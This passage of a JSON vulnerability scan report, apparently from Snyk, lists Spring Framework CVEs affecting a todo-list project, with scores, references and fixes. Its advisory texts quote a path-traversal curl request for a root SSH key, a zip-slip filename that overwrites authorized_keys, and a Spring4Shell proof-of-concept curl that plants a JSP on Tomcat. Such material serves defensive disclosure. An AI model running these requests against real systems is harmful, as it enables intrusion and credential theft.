"SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", - "title": "Directory Traversal", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.2.9.RELEASE", - "4.0.5.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "filePath": "org/springframework/util/StringUtils.java", - "className": "StringUtils", - "functionName": "cleanPath" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/16414", - "title": "GitHub Issue" - }, - { - "url": "https://jira.spring.io/browse/SPR-12354", - "title": "Jira Issue" - }, - { - "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", - "title": "JVNDB" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", - "title": "NVD" - }, - { - "url": "https://pivotal.io/security/cve-2014-3578", - "title": "Pivotal Security" - }, - { - "url": "http://www.pivotal.io/security/cve-2014-3578", - "title": "Pivotal Security" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - 
"cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:25.325641Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). 
In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", - "epssDetails": { - "percentile": "0.69801", - "probability": "0.00301", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-3578" - ], - "CWE": [ - "CWE-22" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:31.465000Z", - "functions_new": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "className": "org.springframework.util.StringUtils", - "functionName": "cleanPath" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2014-09-05T17:16:58Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2014-09-05T17:16:58Z", - "severityBasedOn": "CVSS", - "modificationTime": 
"2024-03-11T09:46:07.314890Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@3.2.9.RELEASE", - "org.springframework:spring-core@3.2.9.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "4ra1n" - ], - "semver": { - "vulnerable": [ - "[,5.2.20.RELEASE)", - "[5.3.0,5.3.17)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.20.RELEASE", - "5.3.17" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28145", - "title": "GitHub Issue" - }, - { - "url": "https://pivotal.io/security/cve-2022-22950", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": 
"2024-03-11T09:53:47.044801Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:01.573408Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.044801Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. 
For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", - "epssDetails": { - "percentile": "0.35300", - "probability": "0.00081", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22950" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2022-03-29T10:05:31.971026Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-03-29T09:51:43Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2022-03-29T14:24:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.044801Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.20.RELEASE", - "org.springframework:spring-expression@5.2.20.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - 
"name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Google OSS-Fuzz team" - ], - "semver": { - "vulnerable": [ - "[,5.2.23.RELEASE)", - "[5.3.0,5.3.26)", - "[6.0.0,6.0.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.23.RELEASE", - "5.3.26", - "6.0.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20861", - "title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:22.626014Z" - }, - { - "type": 
"secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", - "epssDetails": { - "percentile": "0.48906", - "probability": "0.00133", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20861" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-03-23T12:26:39.837900Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-03-23T11:49:46Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": 
"2023-03-23T12:37:13.052190Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.291695Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.23.RELEASE", - "org.springframework:spring-expression@5.2.23.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Google OSS-Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,5.2.24.RELEASE)", - "[5.3.0,5.3.27)", - "[6.0.0,6.0.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.24.RELEASE", - "5.3.27", - "6.0.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20863", - "title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - 
"cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:15.433654Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", - "epssDetails": { - "percentile": "0.70100", - "probability": "0.00306", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20863" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-04-14T06:33:20.884492Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-04-14T06:25:45Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": 
"maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2023-04-14T06:33:21.063044Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:09.820460Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.24.RELEASE", - "org.springframework:spring-expression@5.2.24.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", - "title": "Remote Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ] - }, - "exploit": "High", - "fixedIn": [ - "5.2.20", - "5.3.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ], - "functionId": { - "filePath": "org/springframework/beans/CachedIntrospectionResults.java", - "className": "CachedIntrospectionResults", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", - "title": "CyberKendra Post" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", - "title": "GitHub Commit" - }, - { - "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", - "title": "LunaSec Blog" - }, - { - "url": 
"https://blog.payara.fish/payara-and-spring4shell", - "title": "Payara Blogpost" - }, - { - "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", - "title": "Payara PoC" - }, - { - "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", - "title": "Snyk Blog - Technical Breakdown" - }, - { - "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", - "title": "Snyk PoC" - }, - { - "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", - "title": "Spring Security Announcement" - }, - { - "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", - "title": "Spring Tomcat Mitigation Advice" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-30T15:25:03.231650Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": 
"Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). 
\r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited 
Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", - "epssDetails": { - "percentile": "0.99975", - "probability": "0.97485", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22965" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-03-30T21:42:31.436000Z", - "functions_new": [ - { - "version": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ], - "functionId": { - "className": "org.springframework.beans.CachedIntrospectionResults", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2022-03-30T21:42:24Z", - "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-03-30T22:32:44Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:17.474380Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.20.RELEASE", - "org.springframework:spring-beans@5.2.20.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Rob Ryan" - ], - 
